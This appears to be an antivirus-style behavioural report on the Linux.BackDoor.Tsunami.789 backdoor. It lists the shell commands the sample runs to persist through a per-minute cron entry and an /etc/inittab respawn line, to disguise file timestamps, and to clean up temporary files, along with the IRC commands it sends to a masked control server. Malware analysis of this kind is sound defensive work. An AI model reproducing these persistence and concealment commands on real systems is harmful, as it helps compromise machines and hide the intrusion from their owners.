Linux.BackDoor.Tsunami.789

To ensure autorun and distribution:

Creates or modifies the following files:

Malicious functions:

Launches itself as a daemon

Modifies router settings:

Launches processes:

sh -c chmod 700 <SAMPLE_FULL_PATH> > /dev/null 2>&1 &
sh -c touch -acmr /bin/ls <SAMPLE_FULL_PATH>
chmod 700 <SAMPLE_FULL_PATH>
touch -acmr /bin/ls <SAMPLE_FULL_PATH>
sh -c (crontab -l | grep -v \"<SAMPLE_FULL_PATH>\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00846930886) > /dev/null 2>&1
crontab -l
grep -v <SAMPLE_FULL_PATH>
grep -v no cron
grep -v lesshts/run.sh
sh -c echo \"* * * * * <SAMPLE_FULL_PATH> > /dev/null 2>&1 &\" >> /var/run/.x00846930886
sh -c crontab /var/run/.x00846930886
crontab /var/run/.x00846930886
sh -c rm -rf /var/run/.x00846930886
rm -rf /var/run/.x00846930886
sh -c cat /etc/inittab | grep -v \"<SAMPLE_FULL_PATH>\" > /etc/inittab2
cat /etc/inittab
sh -c echo \"0:2345:respawn:<SAMPLE_FULL_PATH>\" >> /etc/inittab2
sh -c cat /etc/inittab2 > /etc/inittab
cat /etc/inittab2
sh -c rm -rf /etc/inittab2
rm -rf /etc/inittab2
sh -c touch -acmr /bin/ls /etc/inittab
touch -acmr /bin/ls /etc/inittab
/bin/uname -n

Performs operations with the file system:

Modifies file access rights:

Creates or modifies files:

Deletes files:

Network activity:

Awaits incoming connections on ports:

Establishes connection:

Connects to the following servers over the IRC protocol:

Server: 12#.#28.171.44; Command: NICK i386|c|0|997494|unknown\nUSER x00 localhost localhost :1.0+tftp_jun112017\n
Server: 12#.#28.171.44; Command: PONG :FCAB97C1\n
Server: 12#.#28.171.44; Command: MODE i386|c|0|997494|unknown -xi\n
Server: 12#.#28.171.44; Command: MODE i386|c|0|997494|unknown +B\n
Server: 12#.#28.171.44; Command: JOIN #i386 :0599\n

Other:

Collects OS information